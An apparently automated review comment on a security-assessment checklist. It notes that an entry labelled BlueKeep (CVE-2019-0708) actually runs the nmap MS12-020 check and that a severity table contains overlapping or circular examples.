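Review bot: old lines 145-146 label the check "BlueKeep (CVE-2019-0708)" but run the nmap script rdp-vuln-ms12-020, which tests for MS12-020, a different RDP flaw; a result from it would be recorded against the wrong CVE in the report format at old lines 178-184. Relabel the entry as MS12-020 or replace it with a check that actually covers CVE-2019-0708. In the severity table (old lines 169-174), "Auth bypass" appears as a High example while "auth bypass+admin" is a Critical condition, and the Low row's example repeats its condition; tighten those if the table is carried forward.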